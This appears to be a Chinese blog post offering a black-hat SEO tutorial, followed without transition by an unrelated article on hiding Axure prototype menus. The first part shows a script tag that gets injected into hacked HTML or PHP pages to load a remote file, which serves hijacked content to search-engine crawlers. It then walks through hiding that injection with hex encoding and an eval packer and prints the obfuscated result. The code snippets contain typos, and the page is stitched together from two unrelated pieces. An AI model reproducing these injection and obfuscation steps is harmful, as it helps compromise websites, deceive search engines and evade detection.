一些黑帽SEO要对跳转的js代码进行加密，学习JavaScript加密方式，当我们网站被黑时，看到这段代码就明白这就是快照劫持的代码，删掉即可解决网站被黑问题。今天，错误博客（cuowu.com）分享的内容为《黑帽SEO教程为html中的js跳转url加密》。希望对大家有所帮助。

一、未加密的js代码

JavaScript跳转是黑帽SEO中快照劫持常见操作手法，比如在寄生虫程序使用中，在被黑掉的html或php中增加如下代码就可以完成快照劫持：

<script type=”text/javascript” src=”http://cuowu.com/ v6.js”></script>

这段JavaScript代码的作用是引入v6.js文件，v6.js文件中的内容为if判断语句，如果访问的是百度蜘蛛、360蜘蛛、搜狗蜘蛛等，则显示劫持的快照内容，如果是用户直接访问浏览器则会显示原页面内容。

二、16进制加密

首先把上面的命令增加为如下：

window[“document”][“write”](‘scritp type=”text/javascript” scr=”https://cuowu.com/ v6.js”‘)</script>;

然后，对前面双引号内的内容进行16进制加密，后面单引号内容也同样进行16进制加密，依次为：

\x64\x6f\x63\x75\x6d\x65\x6e\x74

\x77\x72\x69\x74\x65

\x73\x63\x72\x69\x74\x70\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63\x6f\x6d\x2f\x76\x36\x2e\x6a\x73

这个可以用utf-8转16进制加密在线工具即可。错误博客站长导航里面有。

站长导航（https://cuowu.com/daohang/）

加密完成后变为：

window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65”](‘\x73\x63\x72\x69\x74\x70\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63\x6f\x6d\x2f\x76\x36\x2e\x6a\x73’)</script>;

三、JS混淆加密压缩

然后，把上述的js代码再次补充一下才能正常运行，即：

<script type=”text/javascript”>

window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65”](‘\x73\x63\x72\x69\x74\x70\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63\x6f\x6d\x2f\x76\x36\x2e\x6a\x73’)</script>;

</script>

把中间window到</script>;的内容利用站长工具的JS混淆加密压缩就可以得到eval加密形式，错误博客站长导航里面有。

站长导航（https://cuowu.com/daohang/）

获得如下加密代码如下：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p;}(‘k[“\m\a\1\9\g\5\l\0”][“\b\4\7\0\5”](\’\2\1\4\7\0\6\e\0\j\6\5\c\8\0\5\q\0\3\i\d\h\d\2\1\4\7\6\0\8\e\2\1\4\c\8\r\0\0\6\2\n\3\3\1\9\a\b\9\f\1\a\g\3\h\o\f\i\2\’)</p>;’,28,28,’x74|x63|x73|x2f|x72|x65|x70|x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|window|x6e|x64|x3a|x36|script|x78|x68′.split(‘|’),0,{}))

最终获得的加密代码如下：

<script type=”text/javascript”>

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p;}(‘k[“\m\a\1\9\g\5\l\0”][“\b\4\7\0\5”](\’\2\1\4\7\0\6\e\0\j\6\5\c\8\0\5\q\0\3\i\d\h\d\2\1\4\7\6\0\8\e\2\1\4\c\8\r\0\0\6\2\n\3\3\1\9\a\b\9\f\1\a\g\3\h\o\f\i\2\’)</p>;’,28,28,’x74|x63|x73|x2f|x72|x65|x70|x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|window|x6e|x64|x3a|x36|script|x78|x68′.split(‘|’),0,{}))

</script>

这就是全部的js加密压缩过程了，解压过程反过来推就可以了。

以上就是错误博客（https://cuowu.com/）分享的内容为《黑帽SEO为html中的js加密（js混淆与16进制加密）》。感谢您的阅读。更多原创搜索“错误博客”。

什么要隐藏Axure原型式需求文档菜单列表？

很多时候产品经理输出完原型图生成HTML文件给到相应的开发、测试等小伙伴提前阅读熟悉产品功能需求，然后再组织讲解产品功能需求，但总有很多小伙伴们不认真听需求讲解，事后对需求理解存在偏差，根据自我对需求的理解进行设计开发，导致研发出来的产品与需求有差异，最后还甩锅给产品经理没有写清楚需求、没有讲明白需求、看不懂需求文档。

根据与开发、测试多年打交道的经验总结，大部分的开发、测试都不太喜欢复杂的需求文档，反而喜欢看原型图以及图中需求说明。

在产品迭代的过程中，为了保证产品需求文档从0-1的完整性，方便新加入的产品经理、开发、测试快速熟悉产品、接手产品，所有的版本迭代记录最好归档在一个Axure文件中。

那么问题来了：在版本迭代的时候即便我们做了需求导航，开发、测试小伙伴可以通过点击导航直接跳转至详细的原型图需求说明页面（上一篇文章有介绍），但是开发、测试小伙伴往往会忽视需求导航，直接从HTML文件的菜单列表直接点开查看（如图1），由于菜单列表太多他们根本看不懂、找不到迭代需求在哪里，这个时候我们就需要利用一些方法隐藏HTML文件左侧的菜单列表，强制开发、测试等小伙伴通过版本迭代需求导航跳转至原型图需求说明页面，这样阅读起来就非常方便快捷。

下面我将通过具体的操作步骤来讲解如何隐藏HTML文件的菜单列表。

第一，Axure生成HTML文件时，选择页面只勾选需求目录大纲，点击生成。

第二，找到刚才生成的HTML文件并打开，找到data文件并打开，剪切这个js文件存放到桌面。

第三，再次用Axure生成HTML文件，选择生成所有页面并点击生成到此前生成的HTML文件中。

第四，再次找到刚才生成的HTML文件并打开，找到data文件并打开，将此前剪切到桌面的js文件替换当前的js文件。

第五，最后打开Axure原型式产品需求文档，就会看到效果如下图不会再显示左侧菜单列表了。